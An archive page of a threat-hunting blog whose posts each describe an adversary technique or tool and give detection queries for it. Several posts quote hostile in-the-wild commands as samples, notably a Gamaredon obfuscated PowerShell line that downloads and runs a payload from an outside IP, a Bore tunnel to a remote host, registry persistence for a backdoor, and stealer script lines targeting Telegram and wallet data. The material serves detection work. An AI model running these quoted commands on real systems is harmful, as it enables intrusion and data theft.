Posts

Showing posts from March, 2025

090. Hunting for Gamaredon's PowerShell Abuse

Hello everyone! We haven't talked about PowerShell abuse for some time, but I think we can continue. And Gamaredon will help us! The group continues to distribute malicious LNK files, which contain PowerShell code to download and execute the payload and open the decoy document, for example:

powershell.exe -WindowStyle hidden echo DsuXBGtDPVpafNQKWfGNQXRPehfejEMnZWqvtPFEKrDQRtLDoRtJCcMjEFenVKrryMHia; Write-HostZVRjgZrFwKSbjNrBtIujdNLLlPq; if (-not(Test-Path iscabv.''zi''p -PathType Leaf)){echo vgUYzpRfaoGxgCSuzlmZCRxmXRnGJKBwooBEEoJgvYqjRXoXTHaspGDtNMuMovanuZezIbSYgAmXMqDOLMczhxmvJtkBJPsVai; &(g''cm i******w*****r) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/iscabv.''zi''p -OutFile iscabv.''zi''p}; Expand-Archive -Path iscabv.''zi''p -DestinationPath Drvx64; star''t  Drvx64/IsCabView.''e...

089. Detecting RMMs from Ransomware Affiliate's Toolkit: NinjaRMM

Hello everyone! I think it's not a secret that ransomware gangs often abuse various RMMs. Some are quite well-known, while others are not seen that often. Recently I spotted another RMM I don't often see in ransomware incidents - it's called NinjaRMM. For example, this tool was used by Medusa ransomware affiliates. As always, we can start from detecting related network communications:

event_type: "dnsreq" AND dns_rname: "ninjarmm.com"

Next thing - common file names related to RMM components, for example:

event_type: "processcreatewin" AND proc_file_name: ("NinjaRMMAgent.exe" OR "NinjaRMMAgenPatcher.exe" OR "ninjarmm-cli.exe")

Finally, let's search for renamed binaries based on the product name:

event_type: "processcreatewin" AND proc_file_productname: "NinjaRMM"

See you tomorrow!

088. Hunting for IntelliJ's Command Line Runner Abuse

Hello everyone! Adversaries always need to execute commands via various command and scripting interpreters. It's a well-known behavior, so they always look for defense evasion techniques. Trend Micro released a report on Water Gamayun, and noted an interesting technique used by the threat actors for proxy execution. The adversary abused a renamed version of IntelliJ's Command Line Runner (runnerw.exe) to execute PowerShell. Of course, we can hunt for similar behaviors by searching for renamed binaries:

event_type: "processcreatewin" AND proc_file_originalfilename: "runnerw.exe" AND NOT proc_file_name: ("runnerw.exe" OR "runnerw64.exe")

As always, more detection opportunities are in the report! See you tomorrow!

087. Detecting Ransomware Affiliate's Toolkit: PowerTool

Hello everyone! Another day - another tool. This time it's not a regular tool, but PowerTool! This is another popular tool abused by ransomware gangs to disable security controls. For example, it's used by Akira ransomware affiliates. Let's start from process creation events:

event_type: "processcreatewin" AND (proc_file_productname: "PowerTool" OR proc_file_originalfilename: "PowerTool.exe")

One more thing - PowerTool's driver loading:

event_type: "processmoduleload" AND file_productname: "PowerTool"

Want more? Here's the sample! See you tomorrow!

086. Detecting Ransomware Affiliate's Toolkit: IObit Unlocker

Hello everyone! Let's keep looking inside a ransomware affiliate's toolkit. This time it's IObit Unlocker. The adversary leverages this tool to unlock files and folders that are locked by other processes. For example, the tool is a part of the RansomHub arsenal. As always, we can look at metadata or, if the adversary installed it, look for corresponding folders:

event_type: "processcreatewin" AND (proc_file_productname: "IObit Unlocker" OR proc_file_path: "IObit")

You can look at the sample yourself and find more detection opportunities, of course! See you tomorrow!

085. Hunting for Malicious SVG Files

Hello everyone! Let's talk about SVG files. Recently many adversaries have leveraged them in their phishing campaigns. What's more, in many cases the threat actors leveraged files with a double extension, for example, New Purchase Order__pdf.svg. These files contain obfuscated JavaScript code, which collects credentials and transmits them to the attacker-controlled server. The double extension makes such files really easy to detect:

event_type: "filecreatewin" AND file_name: ("pdf" AND "svg")

Of course, adversaries may use just the .svg extension, so you can hunt for SVG file creation events in locations common for file downloads, such as Downloads, Desktop, Documents, etc. See you tomorrow!

084. Detecting Ransomware Affiliate's Toolkit: PCHunter

Hello everyone! I've compiled a list of tools abused by ransomware affiliates for defense evasion, and plan to cover every tool in the blog. Today we'll talk about PCHunter. This is another tool leveraged by adversaries to identify processes related to security products and terminate them. As always, let's start from binary detection:

event_type: "processcreatewin" AND proc_file_originalfilename: "PCHunter.exe"

Also, you can search for related DNS requests:

event_type: "dnsreq" AND dns_rname: "epoolsoft.com"

Finally, it's a good idea to search for PCHunter's driver file creation events:

event_type: "filecreatewin" AND file_path: ("PCHunter" AND "sys")

As always, here's a sample. See you tomorrow!

083. Detecting Ransomware Affiliate's Toolkit: HRSword

Hello everyone! Let's talk about another tool in a ransomware affiliate's arsenal. This time it's going to be HRSword! Usually adversaries use it to disable the target machine's defenses. For example, according to this report, the tool was used by Helldown ransomware affiliates to monitor and terminate security-related processes. Let's start from the binary itself, and create a detector based on its metadata:

event_type: "processcreatewin" AND proc_file_originalfilename: "HRSword.exe"

The tool also abuses cmd.exe to copy multiple files to "C:\Windows\System32\drivers\", for example:

cmd.exe /S /D /c" copy Drivers\x32\sysdiag.sys "C:\Windows\System32\drivers\"

Here we can use the following logic:

event_type: "processcreatewin" AND proc_file_name: "cmd.exe" AND cmdline: ("copy" AND "drivers")

Want more detection opportunities? Check the sample! See you tomorrow!

082. Hunting for Malicious Browser Extensions

Hello everyone! Malicious browser extensions are no longer an exotic threat. For example, Rilide. It was first reported in April 2023, but became a common threat, and this report is another proof of it. Can we hunt for such extensions? Of course, yes! For example, threats like Rilide usually modify browser-related LNK files to run the browser with the "--load-extension" argument, like this:

chrome.exe --load-extension="C:\Users\user\AppData\Local\Temp\MalExt"

It means we can hunt for execution of common Chromium-based browsers with this argument:

event_type: "processcreatewin" AND proc_file_name: ("chrome.exe" OR "brave.exe" OR "opera.exe" OR "msedge.exe") AND cmdline: "load-extension"

I'm sure you'll get false positives, but this is what we expect from threat hunting, right? Proper filtering will help you, I'm sure! See you tomorrow!

081. Detecting EarthWorm Network Tunnel Tool

Hello everyone! Let's talk about another tunneling tool popular among adversaries - EarthWorm. The threat actors may use it for network tunneling with a SOCKS5 server and port forwarding functionality. I think you want an example observed ITW, right? Here's one from a recent Cisco Talos report on UAT-5918:

Run32.exe -s ssocksd -l 8888

If we look at EarthWorm's website, we can find more interesting command line arguments we can use to build detection logic, for example, "rssocks" and "rcsocks". So, let's search for process creation events with "ssocksd", "rcsocks" or "rssocks" in the command line:

event_type: "processcreate" AND cmdline: ("ssocksd" OR "rcsocks" OR "rssocks")

Of course, you can experiment with other available arguments as well! See you tomorrow!

080. Detecting Silent Werewolf's Malicious LNK Files

Hello everyone! Today many adversaries leverage malicious LNK files in their operations. And Silent Werewolf (also known as XDSpy) is not an exception. The threat actors use phishing emails to deliver an archive with an LNK file and an INI file. But it's more than an INI file: it's an archive with a legitimate executable, a malicious DLL and a decoy document. Let's focus on the LNK file and the script it executes. Despite the fact there are lots of interesting strings you can use for detection, I've chosen just "Convert.ToChar", as it's quite common for malicious scripts:

event_type: "processcreatewin" AND proc_file_name: "cmd.exe" AND cmdline: "Convert.ToChar"

You can learn more about its behaviors, here is a sample. See you tomorrow!

079. Hunting for DarkWatchman RAT

Hello everyone! How are your threat hunting missions going? Let's talk about DarkWatchman - a RAT leveraged by an activity cluster we track as Watch Wolf. So, let's use it to generate a threat hunting hypothesis. Let's focus on the following behavior:

wscript.exe "C:\Users\user\AppData\Local\c784477d0.js" 188

As you can see, it abuses wscript.exe to execute a malicious JS script located in a specific folder. So, we can hunt for suspicious JS scripts executed from the same folder or its subfolders:

event_type: "processcreatewin" AND proc_file_name: "wscript.exe" AND cmdline: ("AppData\\Local" AND "js")

If you want to learn more about this RAT's behaviours - here's a sample for you. See you tomorrow!

078. Detecting AMOS Stealer's Virtual Machine Checks

Hello everyone! We haven't talked about macOS stealers for some time. This threat is definitely a trend, so let's talk about AMOS. Recently I spotted an interesting anti-analysis procedure leveraged by this stealer:

osascript -e "set memData to do shell script \"system_profiler SPMemoryDataType\"
if memData contains \"QEMU\" or memData contains \"VMware\" then
    do shell script \"exit 42\"
else
    do shell script \"exit 0\"
end if"

The malware checks for the presence of virtual machines and exits with error code 42 if it detects any. We can detect such behavior this way:

event_type: "processcreatemac" AND proc_file_name: "osascript" AND cmdline: ("SPMemoryDataType" AND ("QEMU" OR "VMware"))

If you want to learn more about AMOS behaviors, here's a sample for you. See you tomorrow!

077. Detecting Windows Sandbox Abuse

Hello everyone! We often use sandboxes for malware triage, but what about adversaries? Can they abuse sandboxes to execute malicious code? And the answer is - yes! ESET presented a report on a MirrorFace attack against a Central European diplomatic institute. Among other malware, the threat actors used a heavily customised variant of AsyncRAT. And they ran it... inside Windows Sandbox! The adversary created a scheduled task to run Windows Sandbox with a WSB file as an argument. So, we can hunt for such activity using the following query:

event_type: "processcreatewin" AND proc_file_name: ("WindowsSandbox.exe" OR "wsb.exe") AND cmdline: "wsb"

Make sure you check the report - it's full of interesting detection opportunities! See you tomorrow!

076. Herald Werewolf: Detection Opportunities

Hello everyone! F6 released a public report on an activity cluster we track under the name Herald Werewolf (they named it Telemancon). The activity is quite interesting, so I decided to share the report and look at detection opportunities. The first interesting thing - the adversary drops an obfuscated PowerShell script to the %userprofile%\Contacts folder and abuses the Run key for persistence. We can search for registry modification events related to the Run key with files in the Contacts folder:

event_type: "registryvalueset" AND reg_key_path: "CurrentVersion\\Run" AND reg_value_data: "Contacts"

Another suspicious thing we can search for - PowerShell connects to telegra[.]ph:

event_type: "dnsreq" AND dns_rname: "telegra.ph" AND proc_file_path: "powershell.exe"

Also note the interesting registry modification behaviors - they are also great candidates for hunting! See you tomorrow!

075. Detecting RMMs from Ransomware Affiliate's Toolkit: ConnectWise

Hello everyone! I want to continue sharing information on RMMs abused by various ransomware affiliates and other threat actors. And look at detection opportunities, of course! Today we'll look at another popular RAT - ConnectWise. If you want a fresh example of ConnectWise abuse - here you go. So, let's look at this report from the detection perspective. First of all, the malicious file runs msiexec.exe to install ConnectWise:

msiexec.exe" /i "C:\Users\<USER>\AppData\Local\Temp\ScreenConnect\24.3.7.9067\797046ee258ccec1\ScreenConnect.ClientSetup.msi"

Let's search for msiexec.exe executions with "ScreenConnect" in the target path:

event_type: "processcreatewin" AND proc_file_name: "msiexec.exe" AND cmdline: "ScreenConnect"

Since the adversary uses a legitimate ConnectWise client, we can also hunt for it (or detect it, if you don't use it in your environment):

event_type: "processcreatewin" AND proc...

074. Detecting Ransomware Affiliate's Toolkit: Cloudflared

Hello everyone! Let's keep talking about the modern ransomware affiliate's toolkit. Today we'll look at defense evasion and command and control capabilities. I came across this CISA advisory on Medusa Ransomware, and spotted the following tool - Cloudflared. It's used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly. Of course, adversaries abuse this feature! To create a tunnel, the threat actor should run the following command (or just run the installer, which creates a service and runs the command):

cloudflared.exe tunnel run --token [redacted]

Not very common command line arguments, right? Let's use them to build detection:

event_type: "processcreate" AND cmdline: ("tunnel" AND "run" AND "token")

Have you observed any other interesting tunneling tools ITW recently? See you tomorrow!

073. Detecting RMMs from Ransomware Affiliate's Toolkit: FleetDeck

Hello everyone! Yes, ransomware. Again. Let's look at another RMM abused by adversaries - FleetDeck. I don't see it very often, but there are even public reports showing it's leveraged by ransomware affiliates, for example, ALPHV. By the way, this legitimate remote access tool has a very interesting slogan on its website - "Command and Control". Let's start from DNS requests to fleetdeck[.]io:

event_type: "dnsreq" AND dns_rname: "fleetdeck.io"

Since the tool isn't very common, we can hunt for processes executed from the default installation location:

event_type: "processcreatewin" AND proc_file_path: "FleetDeck Agent"

The installer also uses PowerShell (yes, again) to create a new firewall rule:

powershell.exe -Command "New-NetFirewallRule -DisplayName 'FleetDeck Agent Service' -Name 'FleetDeck Agent Service' -Direction Inbound -Program 'C:\Program Files (x86)\FleetDeck Agent\fleetdeck_agent...

072. Here's How Adversaries Abuse PowerShell to Steal Authentication Material

Hello everyone! Let's keep looking at PowerShell abuse examples observed in-the-wild. I hope you have ScriptBlock events (Event ID 4104) from the PowerShell Operational event log, as we're going to look inside malicious scripts this time. Recently Outpost24 blogged about EncryptHub, and I spotted a very interesting PowerShell script responsible for stealing sensitive data. Let's look at the script from the detection perspective. For example, the adversary attempts to collect Telegram data:

$processname = "telegram"
$pathtele = "$env:userprofile\AppData\Roaming\Telegram Desktop\tdata"

It means we can hunt for Telegram data paths in the ScriptBlock:

event_type: "ScriptExecutionWin" AND script_text: ("Telegram Desktop" AND "tdata")

Another example is collecting crypto wallet data:

"Armory" = Join-Path $env:appdata "\Armory\*.wallet"
"Atomic" = Join-Path $env:appdata "\Atomic\Local Storage\leveldb...

071. Squid Werewolf (APT37): Detection Opportunities

Hello everyone! I hope you checked this report on APT37 (we track this activity cluster as Squid Werewolf) already. As always, let's look at detection opportunities! The adversary leveraged a malicious LNK file to execute PowerShell with the "-nop" argument; of course, we can use it for detection/hunting:

proc_p_file_path: "explorer.exe" AND proc_file_name: "powershell.exe" AND cmdline: "nop"

Also, the threat actors abuse dfsvc.exe, and use a renamed executable to run the malicious code. For example, we can search for renamed files:

event_type: "processcreatewin" AND proc_file_originalfilename: "dfsvc.exe" AND NOT proc_file_name: "dfsvc.exe"

One more opportunity - abusing timeapi[.]io to check the Internet connection:

event_type: "dnsreq" AND dns_rname: "timeapi.io"

Which detection and hunting opportunities have you spotted? See you tomorrow!

070. Can an Adversary Abuse IoT to Deploy Ransomware?

Hello everyone! How do you choose telemetry sources? For example, IoT devices. Do you collect data from this source? Why am I asking? In a recent incident, Akira affiliates (we track this cluster as Neon Wolf) used a webcam to deploy ransomware! The adversary decided to pivot to this device because there was no EDR on it, and it had a few critical vulnerabilities. Was it possible to detect malicious activity earlier? Yes! According to the IoC list, the threat actors also used AnyDesk to enable redundant access. As you already know, it's an extremely common technique; here's an example of how to search for related activity:

event_type: "processcreate" AND proc_file_productname: "anydesk" AND NOT proc_file_path: ("program files" OR "appdata")

I excluded standard installation paths, but you can include them, depending on the amount of noise. Happy hunting! See you tomorrow!

069. Hunting for Suspicious URL Files

Hello everyone! Let's talk about another interesting file type leveraged by adversaries for gaining initial access. I'm talking about .url files. For example, look at Blind Eagle. The adversary uses such files in a series of ongoing campaigns targeting Colombian institutions and government entities. If we look at file names, we can notice that many of them have a double or even triple extension (DOCUMENTO_PDF_CON_INFORMACIÓN_PRUEBA_COVID_19.pdf.zip (1).url). Detecting such files is quite easy, for example:

event_type: "filecreate" AND file_name: ("pdf" AND "url")

At the same time, some files have a single extension (Documento Judicial Nº 00223 - Sentencia 003948 Vigente 28 de enero.url). Thankfully, such files are not very common, and you can still search for creation events during your hunting missions! See you tomorrow!

068. Detecting RMMs from Ransomware Affiliate's Toolkit: MeshAgent

Hello everyone! Let's keep talking about the ransomware affiliate's toolkit. This time about remote monitoring and management (RMM) software. If you checked the report I shared yesterday, you may have noticed the adversary used a number of RMMs. We are going to talk about one of them - MeshAgent. Another example of MeshAgent abuse is Enigma Wolf; you can read about this ransomware gang in this report. As always, we can search for processes with MeshAgent-related metadata:

event_type: "processcreatewin" AND (proc_file_originalfilename: "MeshAgent.exe" OR proc_file_productname: "MeshCentral Agent")

Depending on configuration, you may also observe meshcentral[.]com DNS requests:

event_type: "dnsreq" AND dns_rname: "meshcentral.com"

If your EDR solution collects PDB data, you can use it for detection as well:

event_type: "processcreatewin" AND proc_file_pdb_path: "MeshAgent"

I'm sure you can find even more detection ...

067. Detecting Ransomware Deployment Tools: PDQ Inventory and Deploy

Hello everyone! I think everybody who is reading this blog already knows that the attack lifecycle usually has a number of stages. Of course, you should detect most attacks at early stages, but it's not always possible. Today we'll talk about ransomware deployment tools. In most cases it's the last frontier. If you fail to detect the adversary at this stage - most likely you'll have to deal with encrypted systems in your enterprise. Let's look into a report on MedusaLocker:

"The attacker used PDQ Inventory to get an inventory of the endpoints on the network. PDQ Deploy then used this information to deploy the AVKiller binary and driver under the Windows directory to all the endpoints and execute it. The attacker then used PDQ Deploy to transfer the ransomware binary and execute it."

As you can see, the adversary first used PDQ Inventory for discovery, then PDQ Deploy to evade defenses and deploy ransomware. Let's use metadata to search for such activity:

ev...

066. Detecting Bore - Another Tunneling Tool in Adversary's Kit

Hello everyone! Tunneling tools - they are everywhere! Today we'll look at another example observed in-the-wild - Bore. It's a CLI tool that exposes local ports to a remote server. Want an example? Sure, here you go:

"%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238

Third-rate masquerading, right? I think you noticed the interesting command line parameters we can use for building detections. Here's an example:

event_type: "processcreate" AND cmdline.keyword: /.* local .*/ AND cmdline: (("3389" OR "22") AND "to")

Of course, you can experiment with port numbers and exclusions! See you tomorrow!

065. Detecting App Bound Encryption Bypass and VSCode Abuse

Hello everyone! Today we'll look at Phantom Goblin - a malware operation that leverages social engineering tactics to distribute stealers, which was uncovered by Cyble researchers. Despite the fact many techniques are quite noisy, a few caught my attention. The first one is bypassing App Bound Encryption (ABE) to extract cookie data by running the browser in headless mode and enabling remote debugging. We can use the following query to search for such activity (you can expand the browser list, of course):

event_type: "processcreate" AND proc_file_name: ("brave.exe" OR "chrome.exe" OR "msedge.exe") AND cmdline: ("headless" AND "remote-debugging-port" AND "remote-allow-origins")

Another interesting technique is abusing Visual Studio Code to create a remote tunnel. We can search for such activity using the following query:

event_type: "processcreate" AND proc_file_name: "code.exe" AND cmdline: ...

064. Books on Cyber Threat Intelligence I Like Most

Hello everyone! Today I decided to share a few books on cyber threat intelligence I often recommend. It won't be a long list, just four books to start.

Robert M. Lee, Jeff Haas, Threat Intelligence and Me: A Book for Children and Analysts

Have you ever tried to explain the basic concepts of cyber threat intelligence to a child? No? Well, Robert M. Lee and illustrator Jeff Haas did, and they succeeded quite well. By the way, the book is also suitable for adults, as its title suggests.

Thomas Roccia, Visual Threat Intelligence: An Illustrated Guide For Threat Researchers

This book also contains a wealth of illustrations and is suitable for those who want to understand all the concepts of cyber threat intelligence in the shortest possible time. There is, of course, a textual description as well, but it covers only a couple of pages for each topic. And it will save you a lot of time. It's perfect for those who dislike "fluff."

Kyle Wilhoit, Joseph Opacki, Operationalizing T...

063. Kimsuky Abuses Control Panel Items to Evade Detection

Hello everyone! I think you already noticed that Kimsuky (we track it as Monolithic Werewolf) is a frequent guest in my blog. The thing is - the cluster is quite creative and provides lots of detection ideas! Today we'll look at how the adversary abused Control Panel Items in the campaign described in this report. So, the threat actors used a malicious file with a double extension - [한글] 계엄사-합수본부 운영 참고자료[원본].hwp.cpl. It is a Control Panel item, and is executed with control.exe. It means we can search for abuse of control.exe (you can experiment with double extensions, of course):

event_type: "processcreate" AND proc_file_name: "control.exe" AND cmdline: (("hwp" AND "cpl") OR ("docx" AND "cpl") OR ("pdf" AND "cpl"))

After execution, the file connects to github[.]com to download additional files - and we have another detection opportunity:

event_type: "dnsreq" AND ...

062. A Few Ways to Detect a Dumping Tool from a Ransomware Gang's Toolset

Hello everyone! Today we'll look at another tool from a ransomware gang's toolkit. It's called MiniDump, and it enables adversaries to dump LSASS or any other process. Let's look at a few detection opportunities. The tool drops and loads a driver with the following name - kxxxxxxx.sys. It means we can search for creation events related to it:

event_type: "filecreate" AND file_name: "kxxxxxxx.sys"

MiniDump also creates a service with the same name - another detection opportunity:

event_type: "serviceuninstallwin" AND service_name: "kxxxxxxx.sys"

Finally, the tool loads the driver:

event_type: "driverloadwin" AND file_name: "kxxxxxxx.sys" AND file_sig: "DFOCUS Co., Ltd"

Interestingly, the driver name is the same as in the EDR killer advertised some time ago by the threat actor with the moniker "r1z". See you tomorrow!

061. DONOT Team Has a Presentation for You

Hello everyone! I think you already got used to malicious Microsoft Word documents and Microsoft Excel spreadsheets, right? But what about Microsoft PowerPoint? Of course, we all use it to create presentations for threat briefings, but what about adversaries? Yes, they also use it! Let's look at the DONOT Team (APT-Q-38) campaign described in this report. One of the kill chains included a malicious PowerPoint presentation (PPT), delivered via a link in a phishing PDF document. A malicious macro in the PPT file executes shellcode in order to download the next stages. The first detection opportunity - powerpnt.exe spawns cmd.exe to execute a BAT file:

cmd.exe /c C:\Users\user\AppData\Local\TEMP\FROX\cross.bat

You can catch such activity this way:

event_type: "processcreate" AND proc_p_file_path: "powerpnt.exe" AND proc_file_path: "cmd.exe"

What does the BAT file do? It creates a scheduled task via schtasks.exe:

schtasks /create /tn "PerformTaskMaintain" /...

060. Detecting System Registry Abuse for Installing Sagerunex Backdoor as a Service

Hello everyone! Abusing Windows services is a very common persistence technique. Usually adversaries just create a new service, but in some cases they may also modify existing services! Let's look at such an example. Cisco Talos presented a report on an espionage activity cluster they track as Lotus Blossom. The threat actors leverage reg.exe to modify registry keys related to services and enable persistence of the Sagerunex backdoor:

reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\tapisrv.dll /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv /v Start /t REG_DWORD /d 2 /f

An easy way to hunt for such activity is to search for "ServiceDll" among reg.exe command line parameters:

event_type: "processcreate" AND proc_file_name: "reg.exe" AND cmdline: "ServiceDll"

Depending on your telemetry, you can also search for "ServiceDll" value modification events as well! Hav...